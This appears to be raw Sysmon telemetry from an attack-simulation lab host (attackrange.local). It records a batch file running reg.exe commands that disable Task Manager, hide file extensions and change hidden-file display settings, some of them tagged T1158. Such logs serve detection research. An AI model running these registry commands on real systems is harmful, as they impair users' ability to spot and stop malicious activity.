12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.484{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.474{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000001) 10341000x80000000000000009375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.458{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000001) 10341000x80000000000000009366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.465{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.458{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgrDWORD (0x00000001) 10341000x80000000000000009357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.453{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableTaskMgr" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 